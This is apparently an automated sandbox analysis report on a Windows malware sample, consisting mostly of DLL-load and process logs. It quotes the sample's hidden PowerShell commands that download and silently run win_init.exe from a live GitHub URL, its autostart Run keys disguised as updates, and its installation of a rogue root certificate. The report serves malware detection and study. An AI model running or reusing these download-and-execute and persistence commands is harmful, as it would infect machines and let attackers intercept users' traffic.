                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
                          Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
                          Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                          Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
                          Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: storsvc.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: fltlib.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: bcd.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: cabinet.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: storageusage.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\win_init.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\win_init.exeSection loaded: powrprof.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\win_init.exeSection loaded: umpdc.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\win_init.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\win_init.exeSection loaded: dhcpcsvc6.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\win_init.exeSection loaded: dhcpcsvc.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\win_init.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\win_init.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\win_init.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\win_init.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\win_init.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\win_init.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\win_init.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\win_init.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\win_init.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
                          Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
                          Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
                          Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
                          Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
                          Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\Roaming\win_init.exeSection loaded: powrprof.dll
                          Source: C:\Users\user\AppData\Roaming\win_init.exeSection loaded: umpdc.dll
                          Source: C:\Users\user\AppData\Roaming\win_init.exeSection loaded: iphlpapi.dll
                          Source: C:\Users\user\AppData\Roaming\win_init.exeSection loaded: dhcpcsvc6.dll
                          Source: C:\Users\user\AppData\Roaming\win_init.exeSection loaded: dhcpcsvc.dll
                          Source: C:\Users\user\AppData\Roaming\win_init.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Roaming\win_init.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Roaming\win_init.exeSection loaded: rasadhlp.dll
                          Source: C:\Users\user\AppData\Roaming\win_init.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Roaming\win_init.exeSection loaded: msasn1.dll
                          Source: C:\Users\user\AppData\Roaming\win_init.exeSection loaded: cryptsp.dll
                          Source: C:\Users\user\AppData\Roaming\win_init.exeSection loaded: rsaenh.dll
                          Source: C:\Users\user\AppData\Roaming\win_init.exeSection loaded: cryptbase.dll
                          Source: C:\Users\user\AppData\Roaming\win_init.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
                          Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
                          Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
                          Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
                          Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
                          Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
                          Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
                          Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
                          Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
                          Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
                          Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
                          Source: C:\Windows\System32\notepad.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{56FDF344-FD6D-11d0-958A-006097C9A090}\InProcServer32Jump to behavior
                          Source: C:\Users\user\Desktop\esFK2gm.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "PID eq 7076"
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                          Source: esFK2gm.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                          Source: esFK2gm.exeStatic file information: File size 8918528 > 1048576
                          Source: esFK2gm.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x2a9e00
                          Source: esFK2gm.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x2b9400
                          Source: esFK2gm.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

                          Data Obfuscation

                          barindex
                          Suspicious powershell command line found
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Start-Sleep -s 30; Start-Process 'C:\Users\user\AppData\Roaming\win_init.exe' -WindowStyle Hidden"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Start-Sleep -s 30; Start-Process 'C:\Users\user\AppData\Roaming\win_init.exe' -WindowStyle Hidden"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'"Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Start-Sleep -s 30; Start-Process 'C:\Users\user\AppData\Roaming\win_init.exe' -WindowStyle Hidden"Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Start-Sleep -s 30; Start-Process 'C:\Users\user\AppData\Roaming\win_init.exe' -WindowStyle Hidden"
                          Source: esFK2gm.exeStatic PE information: section name: .xdata
                          Source: esFK2gm.exeStatic PE information: section name: /4
                          Source: esFK2gm.exeStatic PE information: section name: /19
                          Source: esFK2gm.exeStatic PE information: section name: /32
                          Source: esFK2gm.exeStatic PE information: section name: /46
                          Source: esFK2gm.exeStatic PE information: section name: /65
                          Source: esFK2gm.exeStatic PE information: section name: /78
                          Source: esFK2gm.exeStatic PE information: section name: /90
                          Source: esFK2gm.exeStatic PE information: section name: .symtab
                          Source: win_init.exe.5.drStatic PE information: section name: .xdata
                          Source: win_init.exe.5.drStatic PE information: section name: /4
                          Source: win_init.exe.5.drStatic PE information: section name: /19
                          Source: win_init.exe.5.drStatic PE information: section name: /32
                          Source: win_init.exe.5.drStatic PE information: section name: /46
                          Source: win_init.exe.5.drStatic PE information: section name: /65
                          Source: win_init.exe.5.drStatic PE information: section name: /78
                          Source: win_init.exe.5.drStatic PE information: section name: /90
                          Source: win_init.exe.5.drStatic PE information: section name: .symtab
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFB9AB2473D push E85AFB4Ah; ret 5_2_00007FFB9AB247F9
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFB9AB247AD push E85AFB4Ah; ret 5_2_00007FFB9AB247F9
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFB9AB23783 pushad ; ret 9_2_00007FFB9AB23791

                          Persistence and Installation Behavior

                          barindex
                          Installs new ROOT certificates
                          Source: C:\Users\user\Desktop\esFK2gm.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                          Source: C:\Users\user\Desktop\esFK2gm.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\win_init.exeJump to dropped file

                          Boot Survival

                          barindex
                          Creates autostart registry keys with suspicious values (likely registry only malware)
                          Source: C:\Users\user\Desktop\esFK2gm.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WinUpdate cmd /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'"Jump to behavior
                          Source: C:\Users\user\Desktop\esFK2gm.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SystemUpdate cmd /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Start-Sleep -s 30; Start-Process 'C:\Users\user\AppData\Roaming\win_init.exe' -WindowStyle Hidden"Jump to behavior
                          Creates multiple autostart registry keys
                          Source: C:\Users\user\Desktop\esFK2gm.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WinUpdateJump to behavior
                          Source: C:\Users\user\Desktop\esFK2gm.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SystemUpdateJump to behavior
                          Source: C:\Users\user\Desktop\esFK2gm.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WinUpdateJump to behavior
                          Source: C:\Users\user\Desktop\esFK2gm.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WinUpdateJump to behavior
                          Source: C:\Users\user\Desktop\esFK2gm.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SystemUpdateJump to behavior
                          Source: C:\Users\user\Desktop\esFK2gm.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SystemUpdateJump to behavior
                          Source: C:\Users\user\Desktop\esFK2gm.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
                          Source: C:\Users\user\Desktop\esFK2gm.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                          Source: C:\Users\user\Desktop\esFK2gm.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\notepad.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
